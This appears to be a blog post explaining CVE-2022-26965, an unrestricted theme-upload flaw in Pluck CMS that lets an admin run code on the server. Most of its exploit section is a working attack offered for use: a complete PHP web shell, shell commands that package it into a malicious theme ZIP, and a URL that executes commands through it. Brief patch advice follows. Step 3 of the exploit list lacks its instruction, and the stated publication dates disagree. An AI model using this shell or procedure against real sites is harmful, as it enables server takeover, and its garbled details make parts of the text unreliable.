On March 10, 2022, CVE-2022-26965 was published. It describes a high-severity vulnerability in Pluck CMS, an open-source content management system. Versions up to 4.7.16 allow an authenticated admin user to perform Remote Code Execution (RCE) by uploading a malicious theme. This happens due to insufficient validation in the theme upload feature at /admin.php?action=themeinstall.
In this post, I’ll break down the vulnerability in simple terms, explain how it can be exploited, show a code example, and share original references for further reading.
What is Pluck?
Pluck is a lightweight CMS for small websites. It’s written in PHP and lets users manage content, design, and themes from a simple web interface.
The Vulnerability: Unrestricted File Upload
The vulnerability exists in the way Pluck handles theme uploads. An admin can upload a ZIP file containing a theme. The application extracts files from the ZIP into a directory under /data/themes/. However, Pluck does not validate the contents of upload: it doesn't check if the files in the ZIP are only theme files or if they may include PHP files.
This means an attacker with admin access can upload a ZIP archive with a PHP file (“web shell”) inside. Once the ZIP is extracted, the attacker can access the malicious PHP script via the web browser and execute any PHP code on the server.
Impact: This gives the attacker full control of the web server, including the ability to read/write files, pull sensitive information, and further compromise the environment.
Steps to Exploit
1. Login as admin at /admin.php.
2. Go to Settings → Themes → Install New Theme (URL: /admin.php?action=themeinstall).
A standard theme folder structure, plus a PHP web shell (e.g. shell.php).
4. The CMS extracts the ZIP contents to /data/themes/[theme-name]/.
5. The attacker browses to /data/themes/[theme-name]/shell.php and executes arbitrary PHP code.
You can use the following simple PHP shell (save as shell.php)
<?php
if (isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>
File structure of the ZIP you need
malicioustheme/
├── theme.php
├── info.txt
└── shell.php <-- malicious shell
- theme.php and info.txt are standard files required by Pluck for a theme. (They can be empty or contain minimal valid content.)
Create the ZIP on Linux
mkdir malicioustheme
echo "<?php // theme ?>" > malicioustheme/theme.php
echo "Malicious Theme" > malicioustheme/info.txt
echo "<?php if (isset(\$_GET['cmd'])){system(\$_GET['cmd']);} ?>" > malicioustheme/shell.php
zip -r malicioustheme.zip malicioustheme/
Now, upload malicioustheme.zip via the admin panel as noted above.
Exploit the shell
Visit in your browser:
http://[pluck-site]/data/themes/malicioustheme/shell.php?cmd=whoami
Original References
- Exploit-DB Entry 50835
- cve.mitre.org Entry
- Huntr.dev Report
Patch & Mitigation
- Upgrade to the latest version of Pluck.
- Until patched, restrict admin access and use a web application firewall to detect/block suspicious file uploads.
Conclusion
CVE-2022-26965 is a classic example of the dangers of insufficient file validation in web applications. Always double-check what your app lets users upload! Sites running Pluck 4.7.16 or below are vulnerable to complete takeover if an attacker gains admin credentials, so patch immediately.
Further reading:
- Pluck GitHub
Timeline
Published on: 03/18/2022 07:15:00 UTC
Last modified on: 03/25/2022 17:54:00 UTC